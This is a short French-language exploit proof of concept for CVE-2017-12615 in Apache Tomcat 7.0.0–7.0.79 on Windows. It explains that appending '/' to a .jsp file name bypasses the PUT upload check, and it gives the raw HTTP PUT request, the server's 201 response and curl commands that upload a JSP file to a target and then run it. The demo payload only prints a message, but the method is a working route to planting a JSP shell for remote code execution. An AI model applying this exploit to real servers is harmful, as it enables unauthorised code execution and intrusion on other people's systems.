
Exploit POC pour la vulnérabilité PUT JSP Apache Tomcat 7.0.x CVE-2017-12615.
Exploit POC pour Apache Tomcat 7.0.0 à 7.0.79 fonctionnant sous Windows ; vulnérabilité PUT JSP CVE-2017-12615.
Par conception, il n'est pas autorisé de télécharger des fichiers JSP via la méthode PUT sur les serveurs Apache Tomcat. Ceci est probablement une mesure de sécurité pour empêcher un attaquant de télécharger un shell JSP et d'obtenir une exécution de code à distance sur le serveur. Cependant, en raison de contrôles insuffisants, un attaquant peut obtenir une exécution de code à distance sur les serveurs Tomcat 7.0.{0 à 79} qui ont activé PUT en demandant la méthode PUT sur le serveur Tomcat à l'aide d'une requête HTTP spécialement conçue. Mais sérieusement, spécial ? S'il vous plaît.
En ajoutant un caractère '/' derrière l'extension du nom de fichier, on peut contourner la vérification de l'extension de fichier. C'est tout. Donc, pas si spécial en fait.
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85
<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write executed.</h3></body></html>"); %>
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
curl http://target-host-or-ip-address:port/test.jsp